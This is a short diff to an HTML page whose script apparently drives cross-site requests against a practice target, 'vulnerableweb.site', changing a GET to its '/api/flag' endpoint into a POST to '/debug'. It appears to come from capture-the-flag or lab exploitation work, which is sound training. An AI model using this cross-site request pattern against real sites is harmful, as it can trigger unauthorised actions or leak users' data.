--- a/index3.html
+++ b/index3.html
@@ -11,7 +11,7 @@
           xmlhttp2.send();
         };
       };
-      xmlhttp.open("GET", "https://vulnerableweb.site/api/flag", true);
+      xmlhttp.open("POST", "https://vulnerableweb.site/debug", true);
       xmlhttp.send();
     });
     </script>
